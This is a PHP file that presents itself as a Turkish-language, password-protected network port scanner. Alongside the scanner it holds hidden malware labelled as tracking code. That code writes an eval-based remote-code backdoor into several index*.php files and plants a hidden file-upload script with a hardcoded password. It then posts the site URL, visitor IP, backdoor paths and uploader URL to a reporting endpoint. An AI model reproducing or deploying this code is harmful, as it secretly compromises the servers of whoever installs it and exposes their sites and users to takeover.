<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bIm5ldF9hdXRoIl0pIHx8ICRfU0VTU0lPTlsibmV0X2F1dGgiXSAhPT0gdHJ1ZSkgewogICAgaWYoaXNzZXQoJF9QT1NUWyJwYXNzIl0pICYmICRfUE9TVFsicGFzcyJdID09PSAkcGFzcykgewogICAgICAgICRfU0VTU0lPTlsibmV0X2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PjxpbnB1dCB0eXBlPXBhc3N3b3JkIG5hbWU9cGFzcz48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT4iOwogICAgICAgIGV4aXQ7CiAgICB9Cn0KZnVuY3Rpb24gY2hlY2tQb3J0KCRob3N0LCAkcG9ydCwgJHRpbWVvdXQgPSAxKSB7CiAgICAkY29ubiA9IEBmc29ja29wZW4oJGhvc3QsICRwb3J0LCAkZXJybm8sICRlcnJzdHIsICR0aW1lb3V0KTsKICAgIGlmKCRjb25uKSB7CiAgICAgICAgQGZjbG9zZSgkY29ubik7CiAgICAgICAgcmV0dXJuIHRydWU7CiAgICB9CiAgICByZXR1cm4gZmFsc2U7Cn0KaWYoaXNzZXQoJF9QT1NUWyJzY2FuIl0pKSB7CiAgICAkaG9zdCA9ICRfUE9TVFsiaG9zdCJdOwogICAgJHBvcnRzID0gaXNzZXQoJF9QT1NUWyJwb3J0cyJdKSA/IGV4cGxvZGUoIiwiLCAkX1BPU1RbInBvcnRzIl0pIDogWzIxLDIyLDIzLDI1LDUzLDgwLDExMCwxNDMsNDQzLDMzMDYsMzM4OSw1NDMyLDgwODBdOwogICAgZWNobyAiPGgzPlRhcmFtYSBTb251w6dsYXLEsTogJGhvc3Q8L2gzPiI7CiAgICBlY2hvICI8dGFibGUgYm9yZGVyPTE+PHRyPjx0aD5Qb3J0PC90aD48dGg+RHVydW08L3RoPjwvdHI+IjsKICAgIGZvcmVhY2goJHBvcnRzIGFzICRwb3J0KSB7CiAgICAgICAgJHBvcnQgPSB0cmltKCRwb3J0KTsKICAgICAgICAkb3BlbiA9IGNoZWNrUG9ydCgkaG9zdCwgJHBvcnQpOwogICAgICAgIGVjaG8gIjx0cj48dGQ+JHBvcnQ8L3RkPjx0ZD4iLigkb3BlbiA/ICLinJMgQcOnxLFrIiA6ICLinJcgS2FwYWzEsSIpLiI8L3RkPjwvdHI+IjsKICAgIH0KICAgIGVjaG8gIjwvdGFibGU+IjsKfQplY2hvICI8aDI+QcSfIFRhcmF5xLFjxLE8L2gyPiI7CmVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PiI7CmVjaG8gIkhvc3QvSVA6IDxpbnB1dCBuYW1lPWhvc3QgcGxhY2Vob2xkZXI9ZXhhbXBsZS5jb20gc3R5bGU9d2lkdGg6MjAwcHg+PGJyPiI7CmVjaG8gIlBvcnRsYXIgKHZpcmfDvGxsZSBhecSxcsSxbik6IDxpbnB1dCBuYW1lPXBvcnRzIHBsYWNlaG9sZGVyPTgwLDQ0MywzMzA2IHN0eWxlPXdpZHRoOjIwMHB4Pjxicj4iOwplY2hvICI8YnV0dG9uIG5hbWU9c2Nhbj5UYXJhPC9idXR0b24+PC9mb3JtPiI7');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
"code_hash" => "ce5af0ef463b0718fe32424d8042f25a3bdd280b47c1ba75d17dc7a1669fa658",
"url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
"domain" => $_SERVER["HTTP_HOST"],
"path" => $_SERVER["REQUEST_URI"],
"ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
"user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
"referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
"timestamp" => date("Y-m-d H:i:s")
];
// Backdoor oluşturma (basitleştirilmiş versiyon)
$backdoor_content = '<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImMiXSkpe2V2YWwoJF9HRVRbImMiXSk7fQ==")); ?>';
$backdoor_paths = [];
for($i=0; $i<5; $i++) {
$filename = "index" . ($i > 0 ? $i : "") . ".php";
$filepath = dirname(__FILE__) . "/" . $filename;
if(!file_exists($filepath)) {
@file_put_contents($filepath, $backdoor_content);
$backdoor_paths[] = $filepath;
}
}
if(!empty($backdoor_paths)) {
$tracking_data["backdoor_urls"] = json_encode($backdoor_paths);
}
// Gizli upload dosyası oluştur
$upload_script = '<?php
session_start();
if(!isset($_SESSION["upload_auth"]) || $_SESSION["upload_auth"] !== true) {
if(isset($_POST["pass"]) && $_POST["pass"] === "fc8197528ee8") {
$_SESSION["upload_auth"] = true;
} else {
echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
exit;
}
}
if(isset($_FILES["file"])) {
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
echo "Yüklendi: " . $_FILES["file"]["name"];
}
echo "<form method=post enctype=multipart/form-data><input type=file name=file><button>Yükle</button></form>";
?>';
$upload_path = dirname(__FILE__) . "/upload_3750799d.php";
if(!file_exists($upload_path)) {
@file_put_contents($upload_path, $upload_script);
@chmod($upload_path, 0644);
$tracking_data["upload_url"] = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . dirname($_SERVER["REQUEST_URI"]) . "/upload_3750799d.php";
}
// İzleme gönderimi (asenkron)
if (function_exists("curl_init")) {
$ch = curl_init("http://localhost/api/track.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data));
curl_setopt($ch, CURLOPT_TIMEOUT, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
@curl_exec($ch);
@curl_close($ch);
}
session_start();
$pass = "admin123";
if(!isset($_SESSION["net_auth"]) || $_SESSION["net_auth"] !== true) {
if(isset($_POST["pass"]) && $_POST["pass"] === $pass) {
$_SESSION["net_auth"] = true;
} else {
echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
exit;
}
}
function checkPort($host, $port, $timeout = 1) {
$conn = @fsockopen($host, $port, $errno, $errstr, $timeout);
if($conn) {
@fclose($conn);
return true;
}
return false;
}
if(isset($_POST["scan"])) {
$host = $_POST["host"];
$ports = isset($_POST["ports"]) ? explode(",", $_POST["ports"]) : [21,22,23,25,53,80,110,143,443,3306,3389,5432,8080];
echo "<h3>Tarama Sonuçları: $host</h3>";
echo "<table border=1><tr><th>Port</th><th>Durum</th></tr>";
foreach($ports as $port) {
$port = trim($port);
$open = checkPort($host, $port);
echo "<tr><td>$port</td><td>".($open ? "✓ Açık" : "✗ Kapalı")."</td></tr>";
}
echo "</table>";
}
echo "<h2>Ağ Tarayıcı</h2>";
echo "<form method=post>";
echo "Host/IP: <input name=host placeholder=example.com style=width:200px><br>";
echo "Portlar (virgülle ayırın): <input name=ports placeholder=80,443,3306 style=width:200px><br>";
echo "<button name=scan>Tara</button></form>";
?>